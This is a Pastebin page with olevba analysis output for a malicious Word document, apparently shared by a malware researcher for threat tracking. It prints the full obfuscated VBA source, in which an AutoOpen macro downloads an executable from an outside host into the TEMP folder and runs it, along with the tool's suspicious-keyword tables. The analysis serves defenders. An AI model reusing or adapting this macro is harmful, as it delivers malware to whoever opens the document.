SHARE
TWEET

Malicious Word macro

dynamoo Mar 13th, 2015 308 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MAS--B- r-1179776-2.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: r-1179776-2.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: r-1179776-2.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub autoopen()
  16. atqk_x482mp6v
  17. End Sub
  18. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  19. ANALYSIS:
  20. +----------+----------+---------------------------------------+
  21. | Type     | Keyword  | Description                           |
  22. +----------+----------+---------------------------------------+
  23. | AutoExec | AutoOpen | Runs when the Word document is opened |
  24. +----------+----------+---------------------------------------+
  25. -------------------------------------------------------------------------------
  26. VBA MACRO Class1.cls
  27. in file: r-1179776-2.doc - OLE stream: u'Macros/VBA/Class1'
  28. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  29. Public Sub JHyKASbxIHuhtS84()
  30. Dim geRVTgYKeFHEkG74 As Integer
  31. For geRVTgYKeFHEkG74 = 6 To Jl
  32. DoEvents
  33. Next geRVTgYKeFHEkG74
  34. Dim vLMDtrhALGmHPA31 As String
  35. vLMDtrhALGmHPA31 = "CtlLoYxCdDrrCR11"
  36. End Sub
  37.  
  38. Public Sub xlvLhuAzNZGLWN89()
  39. Dim WTCBlIIcmnviie69 As Integer
  40. For WTCBlIIcmnviie69 = 3 To yB
  41. DoEvents
  42. Next WTCBlIIcmnviie69
  43. Dim txdGLvkuqZelnG26 As String
  44. txdGLvkuqZelnG26 = "EIQWCNvZTnSUDK16"
  45. End Sub
  46.  
  47. Public Sub ofWOXlANArfREH64()
  48. Dim lrqvxpqOjtKHXZ44 As Integer
  49. For lrqvxpqOjtKHXZ44 = 9 To sb
  50. DoEvents
  51. Next lrqvxpqOjtKHXZ44
  52. Dim JhORnQktQeAtoT34 As String
  53. JhORnQktQeAtoT34 = "auVlNAaFAtyjZk14"
  54. End Sub
  55.  
  56. Public Sub iTpzwmkdrKMuCX21()
  57. Dim TJIibCvUvHEwoB11 As Integer
  58. For TJIibCvUvHEwoB11 = 9 To LW
  59. DoEvents
  60. Next TJIibCvUvHEwoB11
  61. Dim HIVVBSikgJiUZQ81 As String
  62. HIVVBSikgJiUZQ81 = "fMxregfSOGJXGF72"
  63. End Sub
  64.  
  65. Public Sub pIJXclhCxOCUIg61()
  66. Dim UMhzAWxkJUYXMk41 As Integer
  67. For UMhzAWxkJUYXMk41 = 9 To EN
  68. DoEvents
  69. Next UMhzAWxkJUYXMk41
  70. Dim KQTKzQyaUIqifr31 As String
  71. KQTKzQyaUIqifr31 = "hCrVyddxzYMxnu12"
  72. End Sub
  73.  
  74. Public Sub vpkmlyrWJDiBrW25()
  75. Dim XwHnxUqjsQJfjV15 As Integer
  76. For XwHnxUqjsQJfjV15 = 3 To nR
  77. DoEvents
  78. Next XwHnxUqjsQJfjV15
  79. Dim usyhXcMNzSwbPP86 As String
  80. usyhXcMNzSwbPP86 = "RvRwNBawxPtDCD76"
  81. End Sub
  82.  
  83. Public Sub uxtXPcgVNZdndx27()
  84. Dim kflSpdVIGEJSTo17 As Integer
  85. For kflSpdVIGEJSTo17 = 9 To Ev
  86. DoEvents
  87. Next kflSpdVIGEJSTo17
  88. Dim GbKKfGrepAnaKs88 As String
  89. GbKKfGrepAnaKs88 = "NhiUFRDSNEtdqV78"
  90. End Sub
  91.  
  92. Public Sub XNMdWIxljyiqdn33()
  93. Dim ldllVpEGQrJvvE23 As Integer
  94. For ldllVpEGQrJvvE23 = 7 To fn
  95. DoEvents
  96. Next ldllVpEGQrJvvE23
  97. Dim EeIivNdvntwPKh93 As String
  98. EeIivNdvntwPKh93 = "zgufZAlMWetBtl83"
  99. End Sub
  100.  
  101. Public Sub CeAuCYmrOCqQVL73()
  102. Dim wgNdaiAbrWMBpX53 As Integer
  103. For wgNdaiAbrWMBpX53 = 7 To VT
  104. DoEvents
  105. Next wgNdaiAbrWMBpX53
  106. Dim TyhzAVqoLXvsEI43 As String
  107. TyhzAVqoLXvsEI43 = "rkFiRnkRfMibHQ23"
  108. End Sub
  109.  
  110. Public Sub dRzRKlperameln47()
  111. Dim PHnPXMhvvBrjYE27 As Integer
  112. For PHnPXMhvvBrjYE27 = 1 To UF
  113. DoEvents
  114. Next PHnPXMhvvBrjYE27
  115. Dim MUHnwPBigNIZNg97 As String
  116. MUHnwPBigNIZNg97 = "lLgYbsyEIVkJdl88"
  117. End Sub
  118.  
  119.  
  120. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  121. ANALYSIS:
  122. +------------+----------------+-----------------------------------------+
  123. | Type       | Keyword        | Description                             |
  124. +------------+----------------+-----------------------------------------+
  125. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  126. |            |                | may be used to obfuscate strings        |
  127. |            |                | (option --decode to see all)            |
  128. +------------+----------------+-----------------------------------------+
  129. -------------------------------------------------------------------------------
  130. VBA MACRO àûâàûâàÀàâï.bas
  131. in file: r-1179776-2.doc - OLE stream: u'Macros/VBA/\u0430\u044b\u0432\u0430\u044b\u0432\u0430\u0410\u0430\u0432\u043f'
  132. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  133. #If VBA7 Then
  134.     Private Declare PtrSafe Function ÎðâààÌÐÎëâïâàï Lib "urlmon" Alias _
  135.     "URLDownloadToFileA" (ByVal BHGBkjsdfF As LongPtr, _
  136.     ByVal ÐÎÀðàâûðàÃÎâï As String, _
  137.     ByVal ÐÎÀðàâûðàÃÎâïf As String, _
  138.     ByVal ÐÎÀðàâûðàÃÎâïfd As Long, _
  139.     ByVal ÐÎÀðàâûðàÃÎâïfds As LongPtr) As LongPtr
  140. #Else
  141.     Private Declare Function ÎðâààÌÐÎëâïâàï Lib "urlmon" Alias _
  142.     "URLDownloadToFileA" (ByVal BHGBkjsdfF As Long, _
  143.     ByVal ÐÎÀðàâûðàÃÎâï As String, _
  144.     ByVal ÐÎÀðàâûðàÃÎâïf As String, _
  145.     ByVal ÐÎÀðàâûðàÃÎâïfd As Long, _
  146.     ByVal ÐÎÀðàâûðàÃÎâïfds As Long) As Long
  147. #End If
  148. Sub atqk_x482mp6v()
  149. âàûâÀÀûâïûâà QSzFZhQCxywB("h<tQtFpi:I/t/Uajwubnr„sA.]cloom.Ja@uy/}jWsc/$b4i„n\.SeTxQe["), Environ(QSzFZhQCxywB("TsMQPQ")) & QSzFZhQCxywB("\8f9JmC}h1jhf)geD06R7i5SeNDBTeU_.'elx€e(")
  150. End Sub
  151. Function âàûâÀÀûâïûâà(z0ktwRXRQZl2qo0_ As String, d4ok1z1Z0N As String) As Boolean
  152. ÏÐûâàÀ = ÎðâààÌÐÎëâïâàï(0&, z0ktwRXRQZl2qo0_, d4ok1z1Z0N, 0&, 0&)
  153. Set ãíÃØÀÏøâûà = CreateObject(QSzFZhQCxywB(Chr$(83) & Chr$(132) & Chr$(104) & Chr$(55) & Chr$(101) & Chr$(87) & Chr$(108) & Chr$(89) & Chr$(108) & Chr$(131) & Chr$(46) & Chr$(133) & Chr$(65) & Chr$(52) & Chr$(112) & Chr$(97) & Chr$(112) & Chr$(61) & Chr$(108) & Chr$(117) & Chr$(105) & Chr$(47) & Chr$(99) & Chr$(110) & Chr$(97) & Chr$(122) & Chr$(116) & Chr$(59) & Chr$(105) & Chr$(75) & Chr$(111) & Chr$(54) & Chr$(110) & Chr$(115)))
  154. ãíÃØÀÏøâûà.Open Environ(QSzFZhQCxywB(Chr$(84) & Chr$(106) & Chr$(77) & Chr$(107) & Chr$(80) & Chr$(104))) & QSzFZhQCxywB(Chr$(92) & Chr$(114) & Chr$(102) & Chr$(85) & Chr$(74) & Chr$(71) & Chr$(67) & Chr$(85) & Chr$(104) & Chr$(43) & Chr$(106) & Chr$(95) & Chr$(102) & Chr$(67) & Chr$(103) & Chr$(98) & Chr$(68) & Chr$(105) & Chr$(54) & Chr$(110) & Chr$(55) & Chr$(94) & Chr$(53) & Chr$(42) & Chr$(101) & Chr$(98) & Chr$(68) & Chr$(57) & Chr$(84) & Chr$(127) & Chr$(85) & Chr$(118) & Chr$(46) & Chr$(96) & Chr$(101) & Chr$(36) & Chr$(120) & Chr$(117) & Chr$(101) & Chr$(100))
  155. End Function
  156.  
  157.  
  158.  
  159. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  160. ANALYSIS:
  161. +------------+--------------------+-----------------------------------------+
  162. | Type       | Keyword            | Description                             |
  163. +------------+--------------------+-----------------------------------------+
  164. | Suspicious | CreateObject       | May create an OLE object                |
  165. | Suspicious | Lib                | May run code from a DLL                 |
  166. | Suspicious | Open               | May open a file                         |
  167. | Suspicious | Environ            | May read system environment variables   |
  168. | Suspicious | Chr                | May attempt to obfuscate specific       |
  169. |            |                    | strings                                 |
  170. | Suspicious | URLDownloadToFileA | May download files from the Internet    |
  171. +------------+--------------------+-----------------------------------------+
  172. -------------------------------------------------------------------------------
  173. VBA MACRO àïàâïÏÏàâï.bas
  174. in file: r-1179776-2.doc - OLE stream: u'Macros/VBA/\u0430\u043f\u0430\u0432\u043f\u041f\u041f\u0430\u0432\u043f'
  175. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  176.  
  177. Public Function QSzFZhQCxywB(CwOLiEdjfquIe As String) As String
  178. For pytQnFatnd = 1 To Len(CwOLiEdjfquIe) Step 2
  179. QSzFZhQCxywB = QSzFZhQCxywB & Mid(CwOLiEdjfquIe, pytQnFatnd, 1)
  180. Next
  181. End Function
  182.  
  183. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  184. ANALYSIS:
  185. No suspicious keyword or IOC found.
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top